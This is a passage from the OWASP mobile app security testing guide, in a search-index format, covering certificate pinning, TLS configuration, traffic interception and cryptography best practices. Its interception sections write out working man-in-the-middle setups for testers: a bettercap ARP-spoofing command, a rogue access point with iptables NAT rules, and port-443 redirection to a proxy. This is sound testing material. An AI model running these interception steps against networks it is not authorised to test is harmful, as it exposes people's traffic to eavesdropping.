For many apps, the \"default behavior\" provided by the mobile platform will be secure enough for their use case (in the rare case that a system-trusted CA is compromised the data handled by the app is not considered sensitive or other security measures are taken which are resilient even to such a CA breach). However, for other apps such as financial or health apps, the risk of a CA breach, even if rare, must be considered.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#restricting-trust-identity-pinning","title":"Restricting Trust: Identity Pinning","text":"Some apps might need to further increase their security by restricting the number of CAs that they trust. Typically only the CAs which are used by the developer are explicitly trusted, while disregarding all others. This trust restriction is known as Identity Pinning usually implemented as Certificate Pinning or Public Key Pinning.
In the OWASP MASTG we will be referring to this term as \"Identity Pinning\", \"Certificate Pinning\", \"Public Key Pinning\" or simply \"Pinning\".
Pinning is the process of associating a remote endpoint with a particular identity, such as a X.509 certificate or public key, instead of accepting any certificate signed by a trusted CA. After pinning the server identity (or a certain set, aka. pinset), the mobile app will subsequently connect to those remote endpoints only if the identity matches. Withdrawing trust from unnecessary CAs reduces the app's attack surface.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#general-guidelines","title":"General Guidelines","text":"The OWASP Certificate Pinning Cheat Sheet gives essential guidance on:
Both Android and iOS recommendations match the \"best case\" which is:
subjectPublicKeyInfo
.Pinning has gained a bad reputation since its introduction several years ago. We'd like to clarify a couple of points that are valid at least for mobile application security:
The Android Developers site includes the following warning:
Caution: Certificate Pinning is not recommended for Android applications due to the high risk of future server configuration changes, such as changing to another Certificate Authority, rendering the application unable to connect to the server without receiving a client software update.
They also include this note:
Note that, when using certificate pinning, you should always include a backup key so that if you are forced to switch to new keys or change CAs (when pinning to a CA certificate or an intermediate of that CA), your app's connectivity is unaffected. Otherwise, you must push out an update to the app to restore connectivity.
The first statement can be mistakenly interpreted as saying that they \"do not recommend certificate pinning\". The second statement clarifies this: the actual recommendation is that if developers want to implement pinning they have to take the necessary precautions.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#about-pinning-recommendations-in-apple-developers","title":"About Pinning Recommendations in Apple Developers","text":"Apple recommends thinking long-term and creating a proper server authentication strategy.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#owasp-mastg-recommendation","title":"OWASP MASTG Recommendation","text":"Pinning is a recommended practice, especially for MASVS-L2 apps. However, developers must implement it exclusively for the endpoints under their control and be sure to include backup keys (aka. backup pins) and have a proper app update strategy.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#learn-more","title":"Learn more","text":"One of the core mobile app functions is sending/receiving data over untrusted networks like the Internet. If the data is not properly protected in transit, an attacker with access to any part of the network infrastructure (e.g., a Wi-Fi access point) may intercept, read, or modify it. This is why plaintext network protocols are rarely advisable.
The vast majority of apps rely on HTTP for communication with the backend. HTTPS wraps HTTP in an encrypted connection (the acronym HTTPS originally referred to HTTP over Secure Socket Layer (SSL); SSL is the deprecated predecessor of TLS). TLS allows authentication of the backend service and ensures confidentiality and integrity of the network data.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#recommended-tls-settings","title":"Recommended TLS Settings","text":"Ensuring proper TLS configuration on the server side is also important. The SSL protocol is deprecated and should no longer be used. Also TLS v1.0 and TLS v1.1 have known vulnerabilities and their usage is deprecated in all major browsers by 2020. TLS v1.2 and TLS v1.3 are considered best practice for secure transmission of data. Starting with Android 10 (API level 29) TLS v1.3 will be enabled by default for faster and more secure communication. The major change with TLS v1.3 is that customizing cipher suites is no longer possible and that all of them are enabled when TLS v1.3 is enabled, whereas Zero Round Trip (0-RTT) mode isn't supported.
When both the client and server are controlled by the same organization and used only for communicating with one another, you can increase security by hardening the configuration.
If a mobile application connects to a specific server, its networking stack can be tuned to ensure the highest possible security level for the server's configuration. Lack of support in the underlying operating system may force the mobile application to use a weaker configuration.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#cipher-suites-terminology","title":"Cipher Suites Terminology","text":"Cipher suites have the following structure:
Protocol_KeyExchangeAlgorithm_WITH_BlockCipher_IntegrityCheckAlgorithm\n
This structure includes:
Example: TLS_RSA_WITH_3DES_EDE_CBC_SHA
In the example above, the cipher suite uses:
Note that in TLSv1.3 the Key Exchange Algorithm is not part of the cipher suite, instead it is determined during the TLS handshake.
In the following listing, we\u2019ll present the different algorithms of each part of the cipher suite.
Protocols:
SSLv1
SSLv2
- RFC 6176SSLv3
- RFC 6101TLSv1.0
- RFC 2246TLSv1.1
- RFC 4346TLSv1.2
- RFC 5246TLSv1.3
- RFC 8446Key Exchange Algorithms:
DSA
- RFC 6979ECDSA
- RFC 6979RSA
- RFC 8017DHE
- RFC 2631 - RFC 7919ECDHE
- RFC 4492PSK
- RFC 4279DSS
- FIPS186-4DH_anon
- RFC 2631 - RFC 7919DHE_RSA
- RFC 2631 - RFC 7919DHE_DSS
- RFC 2631 - RFC 7919ECDHE_ECDSA
- RFC 8422ECDHE_PSK
- RFC 8422 - RFC 5489ECDHE_RSA
- RFC 8422Block Ciphers:
DES
- RFC 4772DES_CBC
- RFC 18293DES
- RFC 24203DES_EDE_CBC
- RFC 2420AES_128_CBC
- RFC 3268AES_128_GCM
- RFC 5288AES_256_CBC
- RFC 3268AES_256_GCM
- RFC 5288RC4_40
- RFC 7465RC4_128
- RFC 7465CHACHA20_POLY1305
- RFC 7905 - RFC 7539Integrity Check Algorithms:
MD5
- RFC 6151SHA
- RFC 6234SHA256
- RFC 6234SHA384
- RFC 6234Note that the efficiency of a cipher suite depends on the efficiency of its algorithms.
The following resources contain the latest recommended cipher suites to use with TLS:
Some Android and iOS versions do not support some of the recommended cipher suites, so for compatibility purposes you can check the supported cipher suites for Android and iOS versions and choose the top supported cipher suites.
If you want to verify whether your server supports the right cipher suites, there are various tools you can use:
Finally, verify that the server or termination proxy at which the HTTPS connection terminates is configured according to best practices. See also the OWASP Transport Layer Protection cheat sheet and the Qualys SSL/TLS Deployment Best Practices.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#intercepting-https-traffic","title":"Intercepting HTTP(S) Traffic","text":"In many cases, it is most practical to configure a system proxy on the mobile device, so that HTTP(S) traffic is redirected through an interception proxy running on your host computer. By monitoring the requests between the mobile app client and the backend, you can easily map the available server-side APIs and gain insight into the communication protocol. Additionally, you can replay and manipulate requests to test for server-side vulnerabilities.
Several free and commercial proxy tools are available. Here are some of the most popular:
To use the interception proxy, you'll need to run it on your host computer and configure the mobile app to route HTTP(S) requests to your proxy. In most cases, it is enough to set a system-wide proxy in the network settings of the mobile device - if the app uses standard HTTP APIs or popular libraries such as okhttp
, it will automatically use the system settings.
Using a proxy breaks SSL certificate verification and the app will usually fail to initiate TLS connections. To work around this issue, you can install your proxy's CA certificate on the device. We'll explain how to do this in the OS-specific \"Basic Security Testing\" chapters.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#intercepting-non-http-traffic","title":"Intercepting Non-HTTP Traffic","text":"Interception proxies such as Burp and OWASP ZAP won't show non-HTTP traffic, because they aren't capable of decoding it properly by default. There are, however, Burp plugins available such as:
These plugins can visualize non-HTTP protocols and you will also be able to intercept and manipulate the traffic.
Note that this setup can sometimes become very tedious and is not as straightforward as testing HTTP.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#intercepting-traffic-from-the-app-process","title":"Intercepting Traffic from the App Process","text":"Depending on your goal while testing the app, sometimes it is enough to monitor the traffic before it reaches the network layer or when the responses are received in the app.
You don't need to deploy a fully fledged MITM attack if you simply want to know if a certain piece of sensitive data is being transmitted to the network. In this case you wouldn't even have to bypass pinning, if implemented. You just have to hook the right functions, e.g. SSL_write
and SSL_read
from openssl.
This would work pretty well for apps using standard API libraries functions and classes, however there might be some downsides:
See some examples:
This technique is also useful for other types of traffic such as BLE, NFC, etc. where deploying a MITM attack might be very costly and or complex.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#intercepting-traffic-on-the-network-layer","title":"Intercepting Traffic on the Network Layer","text":"Dynamic analysis by using an interception proxy can be straightforward if standard libraries are used in the app and all communication is done via HTTP. But there are several cases where this does not work:
In these cases you need to monitor and analyze the network traffic first in order to decide what to do next. Luckily, there are several options for redirecting and intercepting network communication:
To be able to get a man-in-the-middle position your host computer should be in the same wireless network as the mobile phone and the gateway it communicates to. Once this is done you need the IP address of your mobile phone. For a full dynamic analysis of a mobile app, all network traffic should be intercepted.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#mitm-attack","title":"MITM Attack","text":"Start your preferred network analyzer tool first, then start bettercap with the following command and replace the IP address below (X.X.X.X) with the target you want to execute the MITM attack against.
$ sudo bettercap -eval \"set arp.spoof.targets X.X.X.X; arp.spoof on; set arp.spoof.internal true; set arp.spoof.fullduplex true;\"\nbettercap v2.22 (built for darwin amd64 with go1.12.1) [type 'help' for a list of commands]\n\n[19:21:39] [sys.log] [inf] arp.spoof enabling forwarding\n[19:21:39] [sys.log] [inf] arp.spoof arp spoofer started, probing 1 targets.\n
bettercap will then automatically send the packets to the network gateway in the (wireless) network and you are able to sniff the traffic. Beginning of 2019 support for full duplex ARP spoofing was added to bettercap.
On the mobile phone start the browser and navigate to http://example.com
, you should see output like the following when you are using Wireshark.
If that's the case, you are now able to see the complete network traffic that is sent and received by the mobile phone. This includes also DNS, DHCP and any other form of communication and can therefore be quite \"noisy\". You should therefore know how to use DisplayFilters in Wireshark or know how to filter in tcpdump to focus only on the relevant traffic for you.
Man-in-the-middle attacks work against any device and operating system as the attack is executed on OSI Layer 2 through ARP Spoofing. When you are MITM you might not be able to see clear text data, as the data in transit might be encrypted by using TLS, but it will give you valuable information about the hosts involved, the protocols used and the ports the app is communicating with.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#simulating-a-man-in-the-middle-attack-with-an-access-point","title":"Simulating a Man-in-the-Middle Attack with an access point","text":""},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#network-setup_1","title":"Network Setup","text":"A simple way to simulate a man-in-the-middle (MITM) attack is to configure a network where all packets between the devices in scope and the target network are going through your host computer. In a mobile penetration test, this can be achieved by using an access point to which the mobile devices and your host computer are connected. Your host computer then becomes a router and an access point.
Following scenarios are possible:
The scenario with an external USB WiFi card requires that the card has the capability to create an access point. Additionally, you need to install some tools and/or configure the network to enforce a man-in-the-middle position (see below). You can verify if your WiFi card has AP capabilities by using the command iw
on Kali Linux:
iw list | grep AP\n
The scenario with a separate access point requires access to the configuration of the AP and you should check first if the AP supports either:
In both cases the AP needs to be configured to point to your host computer's IP. Your host computer must be connected to the AP (via wired connection or WiFi) and you need to have connection to the target network (can be the same connection as to the AP). Some additional configuration may be required on your host computer to route traffic to the target network.
If the separate access point belongs to the customer, all changes and configurations should be clarified prior to the engagement and a backup should be created, before making any changes.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#installation","title":"Installation","text":"The following procedure is setting up a man-in-the-middle position using an access point and an additional network interface:
Create a WiFi network either through a separate access point or through an external USB WiFi card or through the built-in card of your host computer.
This can be done by using the built-in utilities on macOS. You can share the internet connection on Mac with other network users.
For all major Linux and Unix operating systems you need tools such as:
For Kali Linux you can install these tools with apt-get
:
apt-get update\napt-get install hostapd dnsmasq aircrack-ng\n
iptables and wpa_supplicant are installed by default on Kali Linux.
In case of a separate access point, route the traffic to your host computer. In case of an external USB WiFi card or built-in WiFi card the traffic is already available on your host computer.
Route the incoming traffic coming from the WiFi to the additional network interface where the traffic can reach the target network. The additional network interface can be a wired connection or another WiFi card, depending on your setup.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#configuration","title":"Configuration","text":"We focus on the configuration files for Kali Linux. Following values need to be defined:
The following configuration files need to be changed and adjusted accordingly:
hostapd.conf
# Name of the WiFi interface we use\ninterface=wlan1\n# Use the nl80211 driver\ndriver=nl80211\nhw_mode=g\nchannel=6\nwmm_enabled=1\nmacaddr_acl=0\nauth_algs=1\nignore_broadcast_ssid=0\nwpa=2\nwpa_key_mgmt=WPA-PSK\nrsn_pairwise=CCMP\n# Name of the AP network\nssid=STM-AP\n# Password of the AP network\nwpa_passphrase=password\n
wpa_supplicant.conf
network={\n ssid=\"NAME_OF_THE_TARGET_NETWORK\"\n psk=\"PASSWORD_OF_THE_TARGET_NETWORK\"\n}\n
dnsmasq.conf
interface=wlan1\ndhcp-range=10.0.0.10,10.0.0.250,12h\ndhcp-option=3,10.0.0.1\ndhcp-option=6,10.0.0.1\nserver=8.8.8.8\nlog-queries\nlog-dhcp\nlisten-address=127.0.0.1\n
To be able to get a man-in-the-middle position you need to run the above configuration. This can be done by using the following commands on Kali Linux:
# check if other process is not using WiFi interfaces\n$ airmon-ng check kill\n# configure IP address of the AP network interface\n$ ifconfig wlan1 10.0.0.1 up\n# start access point\n$ hostapd hostapd.conf\n# connect the target network interface\n$ wpa_supplicant -B -i wlan0 -c wpa_supplicant.conf\n# run DNS server\n$ dnsmasq -C dnsmasq.conf -d\n# enable routing\n$ echo 1 > /proc/sys/net/ipv4/ip_forward\n# iptables will NAT connections from AP network interface to the target network interface\n$ iptables --flush\n$ iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE\n$ iptables --append FORWARD --in-interface wlan1 -j ACCEPT\n$ iptables -t nat -A POSTROUTING -j MASQUERADE\n
Now you can connect your mobile devices to the access point.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#network-analyzer-tool","title":"Network Analyzer Tool","text":"Install a tool that allows you to monitor and analyze the network traffic that will be redirected to your host computer. The two most common network monitoring (or capturing) tools are:
Wireshark offers a GUI and is more straightforward if you are not used to the command line. If you are looking for a command line tool you should either use TShark or tcpdump. All of these tools are available for all major Linux and Unix operating systems and should be part of their respective package installation mechanisms.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#setting-a-proxy-through-runtime-instrumentation","title":"Setting a Proxy Through Runtime Instrumentation","text":"On a rooted or jailbroken device, you can also use runtime hooking to set a new proxy or redirect network traffic. This can be achieved with hooking tools like Inspeckage or code injection frameworks like Frida and cycript. You'll find more information about runtime instrumentation in the \"Reverse Engineering and Tampering\" chapters of this guide.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#example-dealing-with-xamarin","title":"Example - Dealing with Xamarin","text":"As an example, we will now redirect all requests from a Xamarin app to an interception proxy.
Xamarin is a mobile application development platform that is capable of producing native Android and iOS apps by using Visual Studio and C# as programming language.
When testing a Xamarin app and when you are trying to set the system proxy in the Wi-Fi settings you won't be able to see any HTTP requests in your interception proxy, as the apps created by Xamarin do not use the local proxy settings of your phone. There are three ways to resolve this:
1st way: Add a default proxy to the app, by adding the following code in the OnCreate
or Main
method and re-create the app:
WebRequest.DefaultWebProxy = new WebProxy(\"192.168.11.1\", 8080);\n
2nd way: Use bettercap in order to get a man-in-the-middle position (MITM), see the section above about how to setup a MITM attack. When being MITM you only need to redirect port 443 to your interception proxy running on localhost. This can be done by using the command rdr
on macOS:
$ echo \"\nrdr pass inet proto tcp from any to any port 443 -> 127.0.0.1 port 8080\n\" | sudo pfctl -ef -\n
For Linux systems you can use iptables
:
sudo iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 127.0.0.1:8080\n
As last step, you need to set the option 'Support invisible proxy' in the listener settings of Burp Suite.
3rd way: Instead of bettercap an alternative is tweaking the /etc/hosts
on the mobile phone. Add an entry into /etc/hosts
for the target domain and point it to the IP address of your intercepting proxy. This creates a similar situation of being MITM as with bettercap and you need to redirect port 443 to the port which is used by your interception proxy. The redirection can be applied as mentioned above. Additionally, you need to redirect traffic from your interception proxy to the original location and port.
When redirecting traffic you should create narrow rules to the domains and IPs in scope, to minimize noise and out-of-scope traffic.
The interception proxy needs to listen to the port specified in the port forwarding rule above, which is 8080.
When a Xamarin app is configured to use a proxy (e.g. by using WebRequest.DefaultWebProxy
) you need to specify where traffic should go next, after redirecting the traffic to your intercepting proxy. You need to redirect the traffic to the original location. The following procedure is setting up a redirection in Burp to the original location:
Go to Request handling tab and set:
If not already done, install the CA certificates in your mobile device which will allow us to intercept HTTPS requests:
Start using the app and trigger its functions. You should see HTTP messages showing up in your interception proxy.
When using bettercap you need to activate \"Support invisible proxying\" in Proxy Tab / Options / Edit Interface
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/","title":"Mobile App Cryptography","text":"Cryptography plays an especially important role in securing the user's data - even more so in a mobile environment, where attackers having physical access to the user's device is a likely scenario. This chapter provides an outline of cryptographic concepts and best practices relevant to mobile apps. These best practices are valid independent of the mobile operating system.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#key-concepts","title":"Key Concepts","text":"The goal of cryptography is to provide constant confidentiality, data integrity, and authenticity, even in the face of an attack. Confidentiality involves ensuring data privacy through the use of encryption. Data integrity deals with data consistency and detection of tampering and modification of data through the use of hashing. Authenticity ensures that the data comes from a trusted source.
Encryption algorithms convert plaintext data into cipher text that conceals the original content. Plaintext data can be restored from the cipher text through decryption. Encryption can be symmetric (encryption/decryption with same secret-key) or asymmetric (encryption/decryption using a public and private key pair). In general, encryption operations do not protect integrity, but some symmetric encryption modes also feature that protection.
Symmetric-key encryption algorithms use the same key for both encryption and decryption. This type of encryption is fast and suitable for bulk data processing. Since everybody who has access to the key is able to decrypt the encrypted content, this method requires careful key management and centralized control over key distribution.
Public-key encryption algorithms operate with two separate keys: the public key and the private key. The public key can be distributed freely while the private key shouldn't be shared with anyone. A message encrypted with the public key can only be decrypted with the private key and vice-versa. Since asymmetric encryption is several times slower than symmetric operations, it's typically only used to encrypt small amounts of data, such as symmetric keys for bulk encryption.
Hashing isn't a form of encryption, but it does use cryptography. Hash functions deterministically map arbitrary pieces of data into fixed-length values. It's easy to compute the hash from the input, but very difficult (i.e. infeasible) to determine the original input from the hash. Additionally, the hash will completely change when even a single bit of the input changes. Hash functions are used for integrity verification, but don't provide an authenticity guarantee.
Message Authentication Codes (MACs) combine other cryptographic mechanisms (such as symmetric encryption or hashes) with secret keys to provide both integrity and authenticity protection. However, in order to verify a MAC, multiple entities have to share the same secret key and any of those entities can generate a valid MAC. HMACs, the most commonly used type of MAC, rely on hashing as the underlying cryptographic primitive. The full name of an HMAC algorithm usually includes the underlying hash function's type (for example, HMAC-SHA256 uses the SHA-256 hash function).
Signatures combine asymmetric cryptography (that is, using a public/private key pair) with hashing to provide integrity and authenticity by encrypting the hash of the message with the private key. However, unlike MACs, signatures also provide non-repudiation property as the private key should remain unique to the data signer.
Key Derivation Functions (KDFs) derive secret keys from a secret value (such as a password) and are used to turn keys into other formats or to increase their length. KDFs are similar to hashing functions but have other uses as well (for example, they are used as components of multi-party key-agreement protocols). While both hashing functions and KDFs must be difficult to reverse, KDFs have the added requirement that the keys they produce must have a level of randomness.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#identifying-insecure-andor-deprecated-cryptographic-algorithms","title":"Identifying Insecure and/or Deprecated Cryptographic Algorithms","text":"When assessing a mobile app, you should make sure that it does not use cryptographic algorithms and protocols that have significant known weaknesses or are otherwise insufficient for modern security requirements. Algorithms that were considered secure in the past may become insecure over time; therefore, it's important to periodically check current best practices and adjust configurations accordingly.
Verify that cryptographic algorithms are up to date and in-line with industry standards. Vulnerable algorithms include outdated block ciphers (such as DES and 3DES), stream ciphers (such as RC4), hash functions (such as MD5 and SHA1), and broken random number generators (such as Dual_EC_DRBG and SHA1PRNG). Note that even algorithms that are certified (for example, by NIST) can become insecure over time. A certification does not replace periodic verification of an algorithm's soundness. Algorithms with known weaknesses should be replaced with more secure alternatives. Additionally, algorithms used for encryption must be standardized and open to verification. Encrypting data using any unknown, or proprietary algorithms may expose the application to different cryptographic attacks which may result in recovery of the plaintext.
Inspect the app's source code to identify instances of cryptographic algorithms that are known to be weak, such as:
The names of cryptographic APIs depend on the particular mobile platform.
Please make sure that:
The following algorithms are recommended:
Additionally, you should always rely on secure hardware (if available) for storing encryption keys, performing cryptographic operations, etc.
For more information on algorithm choice and best practices, see the following resources:
Even the most secure encryption algorithm becomes vulnerable to brute-force attacks when that algorithm uses an insufficient key size.
Ensure that the key length fulfills accepted industry standards.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#symmetric-encryption-with-hard-coded-cryptographic-keys","title":"Symmetric Encryption with Hard-Coded Cryptographic Keys","text":"The security of symmetric encryption and keyed hashes (MACs) depends on the secrecy of the key. If the key is disclosed, the security gained by encryption is lost. To prevent this, never store secret keys in the same place as the encrypted data they helped create. A common mistake is encrypting locally stored data with a static, hardcoded encryption key and compiling that key into the app. This makes the key accessible to anyone who can use a disassembler.
A hardcoded encryption key means that a key is:
First, ensure that no keys or passwords are stored within the source code. This means you should check native code, JavaScript/Dart code, Java/Kotlin code on Android and Objective-C/Swift in iOS. Note that hard-coded keys are problematic even if the source code is obfuscated since obfuscation is easily bypassed by dynamic instrumentation.
If the app is using two-way TLS (both server and client certificates are validated), make sure that:
If the app relies on an additional encrypted container stored in app data, check how the encryption key is used. If a key-wrapping scheme is used, ensure that the master secret is initialized for each user or the container is re-encrypted with new key. If you can use the master secret or previous password to decrypt the container, check how password changes are handled.
Secret keys must be stored in secure device storage whenever symmetric cryptography is used in mobile apps. For more information on the platform-specific APIs, see the \"Data Storage on Android\" and \"Data Storage on iOS\" chapters.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#weak-key-generation-functions","title":"Weak Key Generation Functions","text":"Cryptographic algorithms (such as symmetric encryption or some MACs) expect a secret input of a given size. For example, AES uses a key of exactly 16 bytes. A native implementation might use the user-supplied password directly as an input key. Using a user-supplied password as an input key has the following problems:
Ensure that passwords aren't directly passed into an encryption function. Instead, the user-supplied password should be passed into a KDF to create a cryptographic key. Choose an appropriate iteration count when using password derivation functions. For example, NIST recommends an iteration count of at least 10,000 for PBKDF2 and for critical keys where user-perceived performance is not critical at least 10,000,000. For critical keys, it is recommended to consider implementation of algorithms recognized by Password Hashing Competition (PHC) like Argon2.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#weak-random-number-generators","title":"Weak Random Number Generators","text":"It is fundamentally impossible to produce truly random numbers on any deterministic device. Pseudo-random number generators (RNG) compensate for this by producing a stream of pseudo-random numbers - a stream of numbers that appear as if they were randomly generated. The quality of the generated numbers varies with the type of algorithm used. Cryptographically secure RNGs generate random numbers that pass statistical randomness tests, and are resilient against prediction attacks (e.g. it is statistically infeasible to predict the next number produced).
Mobile SDKs offer standard implementations of RNG algorithms that produce numbers with sufficient artificial randomness. We'll introduce the available APIs in the Android and iOS specific sections.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#custom-implementations-of-cryptography","title":"Custom Implementations of Cryptography","text":"Inventing proprietary cryptographic functions is time consuming, difficult, and likely to fail. Instead, we can use well-known algorithms that are widely regarded as secure. Mobile operating systems offer standard cryptographic APIs that implement those algorithms.
Carefully inspect all the cryptographic methods used within the source code, especially those that are directly applied to sensitive data. All cryptographic operations should use standard cryptographic APIs for Android and iOS (we'll write about those in more detail in the platform-specific chapters). Any cryptographic operations that don't invoke standard routines from known providers should be closely inspected. Pay close attention to standard algorithms that have been modified. Remember that encoding isn't the same as encryption! Always investigate further when you find bit manipulation operators like XOR (exclusive OR).
At all implementations of cryptography, you need to ensure that the following always takes place:
Advanced Encryption Standard (AES) is the widely accepted standard for symmetric encryption in mobile apps. It's an iterative block cipher that is based on a series of linked mathematical operations. AES performs a variable number of rounds on the input, each of which involves substitution and permutation of the bytes in the input block. Each round uses a 128-bit round key which is derived from the original AES key.
As of this writing, no efficient cryptanalytic attacks against AES have been discovered. However, implementation details and configurable parameters such as the block cipher mode leave some margin for error.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#weak-block-cipher-mode","title":"Weak Block Cipher Mode","text":"Block-based encryption is performed upon discrete input blocks (for example, AES has 128-bit blocks). If the plaintext is larger than the block size, the plaintext is internally split up into blocks of the given input size and encryption is performed on each block. A block cipher mode of operation (or block mode) determines if the result of encrypting the previous block impacts subsequent blocks.
ECB (Electronic Codebook) divides the input into fixed-size blocks that are encrypted separately using the same key. If multiple divided blocks contain the same plaintext, they will be encrypted into identical ciphertext blocks which makes patterns in data easier to identify. In some situations, an attacker might also be able to replay the encrypted data.
Verify that Cipher Block Chaining (CBC) mode is used instead of ECB. In CBC mode, plaintext blocks are XORed with the previous ciphertext block. This ensures that each encrypted block is unique and randomized even if blocks contain the same information. Please note that it is best to combine CBC with an HMAC and/or ensure that no errors are given such as \"Padding error\", \"MAC error\", \"decryption failed\" in order to be more resistant to a padding oracle attack.
When storing encrypted data, we recommend using a block mode that also protects the integrity of the stored data, such as Galois/Counter Mode (GCM). The latter has the additional benefit that the algorithm is mandatory for each TLSv1.2 implementation, and thus is available on all modern platforms.
For more information on effective block modes, see the NIST guidelines on block mode selection.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#predictable-initialization-vector","title":"Predictable Initialization Vector","text":"CBC, OFB, CFB, PCBC, GCM mode require an initialization vector (IV) as an initial input to the cipher. The IV doesn't have to be kept secret, but it shouldn't be predictable: it should be random and unique/non-repeatable for each encrypted message. Make sure that IVs are generated using a cryptographically secure random number generator. For more information on IVs, see Crypto Fail's initialization vectors article.
Pay attention to cryptographic libraries used in the code: many open source libraries provide examples in their documentations that might follow bad practices (e.g. using a hardcoded IV). A popular mistake is copy-pasting example code without changing the IV value.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#initialization-vectors-in-stateful-operation-modes","title":"Initialization Vectors in stateful operation modes","text":"Please note that the usage of IVs is different when using CTR and GCM mode in which the initialization vector is often a counter (in CTR combined with a nonce). So here using a predictable IV with its own stateful model is exactly what is needed. In CTR you have a new nonce plus counter as an input to every new block operation. For example: for a 5120 bit long plaintext: you have 20 blocks, so you need 20 input vectors consisting of a nonce and counter. Whereas in GCM you have a single IV per cryptographic operation, which should not be repeated with the same key. See section 8 of the documentation from NIST on GCM for more details and recommendations of the IV.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#padding-oracle-attacks-due-to-weaker-padding-or-block-operation-implementations","title":"Padding Oracle Attacks due to Weaker Padding or Block Operation Implementations","text":"In the old days, PKCS1.5 padding (in code: PKCS1Padding
) was used as a padding mechanism when doing asymmetric encryption. This mechanism is vulnerable to the padding oracle attack. Therefore, it is best to use OAEP (Optimal Asymmetric Encryption Padding) captured in PKCS#1 v2.0 (in code: OAEPPadding
, OAEPwithSHA-256andMGF1Padding
, OAEPwithSHA-224andMGF1Padding
, OAEPwithSHA-384andMGF1Padding
, OAEPwithSHA-512andMGF1Padding
). Note that, even when using OAEP, you can still run into an issue known best as the Manger's attack as described in the blog at Kudelskisecurity.
Note: AES-CBC with PKCS #5 has shown to be vulnerable to padding oracle attacks as well, given that the implementation gives warnings, such as \"Padding error\", \"MAC error\", or \"decryption failed\". See The Padding Oracle Attack and The CBC Padding Oracle Problem for an example. Next, it is best to ensure that you add an HMAC after you encrypt the plaintext: after all a ciphertext with a failing MAC will not have to be decrypted and can be discarded.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#protecting-keys-in-storage-and-in-memory","title":"Protecting Keys in Storage and in Memory","text":"When memory dumping is part of your threat model, then keys can be accessed the moment they are actively used. Memory dumping either requires root-access (e.g. a rooted device or jailbroken device) or it requires a patched application with Frida (so you can use tools like Fridump). Therefore it is best to consider the following, if keys are still needed at the device:
Note: given the ease of memory dumping, never share the same key among accounts and/or devices, other than public keys used for signature verification or encryption.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#protecting-keys-in-transport","title":"Protecting Keys in Transport","text":"When keys need to be transported from one device to another, or from the app to a backend, make sure that proper key protection is in place, by means of a transport keypair or another mechanism. Often, keys are shared with obfuscation methods which can be easily reversed. Instead, make sure asymmetric cryptography or wrapping keys are used. For example, a symmetric key can be encrypted with the public key from an asymmetric key pair.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#cryptographic-apis-on-android-and-ios","title":"Cryptographic APIs on Android and iOS","text":"While same basic cryptographic principles apply independent of the particular OS, each operating system offers its own implementation and APIs. Platform-specific cryptographic APIs for data storage are covered in greater detail in the \"Data Storage on Android\" and \"Testing Data Storage on iOS\" chapters. Encryption of network traffic, especially Transport Layer Security (TLS), is covered in the \"Android Network APIs\" chapter.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#cryptographic-policy","title":"Cryptographic Policy","text":"In larger organizations, or when high-risk applications are created, it can often be a good practice to have a cryptographic policy, based on frameworks such as NIST Recommendation for Key Management. When basic errors are found in the application of cryptography, it can be a good starting point of setting up a lessons learned / cryptographic key management policy.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#cryptography-regulations","title":"Cryptography Regulations","text":"When you upload the app to the App Store or Google Play, your application is typically stored on a US server. If your app contains cryptography and is distributed to any other country, it is considered a cryptography export. It means that you need to follow US export regulations for cryptography. Also, some countries have import regulations for cryptography.
Learn more:
Mobile app developers use a wide variety of programming languages and frameworks. As such, common vulnerabilities such as SQL injection, buffer overflows, and cross-site scripting (XSS), may manifest in apps when neglecting secure programming practices.
The same programming flaws may affect both Android and iOS apps to some degree, so we'll provide an overview of the most common vulnerability classes in the general section of the guide. In later sections, we will cover OS-specific instances and exploit mitigation features.
"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#injection-flaws","title":"Injection Flaws","text":"An injection flaw describes a class of security vulnerability occurring when user input is inserted into backend queries or commands. By injecting meta-characters, an attacker can execute malicious code that is inadvertently interpreted as part of the command or query. For example, by manipulating a SQL query, an attacker could retrieve arbitrary database records or manipulate the content of the backend database.
Vulnerabilities of this class are most prevalent in server-side web services. Exploitable instances also exist within mobile apps, but occurrences are less common, plus the attack surface is smaller.
For example, while an app might query a local SQLite database, such databases usually do not store sensitive data (assuming the developer followed basic security practices). This makes SQL injection a non-viable attack vector. Nevertheless, exploitable injection vulnerabilities sometimes occur, meaning proper input validation is a necessary best practice for programmers.
